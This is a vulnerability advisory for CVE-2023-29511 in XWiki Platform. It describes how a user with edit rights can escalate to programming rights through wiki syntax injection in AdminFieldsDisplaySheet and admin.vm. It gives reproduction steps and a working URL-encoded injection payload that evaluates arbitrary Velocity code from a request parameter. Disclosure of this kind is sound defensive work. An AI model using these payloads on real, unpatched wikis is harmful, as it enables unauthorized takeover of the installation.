Headline
CVE-2023-29511: Privilege escalation (PR) from account/view through AdminFieldsDisplaySheet and admin.vm
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with edit rights on a page (e.g., it’s own user page), can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the section ids in XWiki.AdminFieldsDisplaySheet. This page is installed by default. The vulnerability has been patched in XWiki versions 15.0-rc-1, 14.10.1, 14.4.8, and 13.10.11.
Steps to reproduce:
Add
{{template name="admin.vm" output="false"/}}
{{display reference="XWiki.AdminFieldsDisplaySheet"/}}
to any place where you can use wiki syntax like the “about” section in your user profile as a user without programming or script rights.
Add the URL parameter section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D.
Expected results:
Some errors or nothing is displayed.
Actual result:
hello from groovy! followed by some raw HTML is displayed.
This shows that a user without script or programming rights can execute a Groovy macro and thus in principle gain programming rights. There is a caveat which is that the executed code is first converted to lowercase. While this means a lot of the API is not available there are workarounds like using
{{velocity}}#evaluate($request.exploit){{/velocity}}
as main exploit code and thus executing the content of a request parameter. A fully working set of parameters would be
section=%7B%7B%2Fhtml%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%2Crequest.exploit%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate%28%24request.exploit%29%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D&exploit=Hello+from+Velocity%21+%24hasProgramming
which results in the output Hello from Velocity! true, thus showing that we have programming rights in Velocity and no more restrictions. Without escaping, the corresponding parameter values are
{{/html}} {{async async="true" cached="false" context="doc.reference,request.exploit"}}{{velocity}}#evaluate($request.exploit){{/velocity}}{{/async}}
for section and
Hello from Velocity! $hasProgramming
for exploit.
This exploit is possible because XWiki.AdminFieldsDisplaySheet outputs $section (and other variables) without further escaping, thus allowing XWiki syntax injection and admin.vm can be abused to set $section from the section request parameter.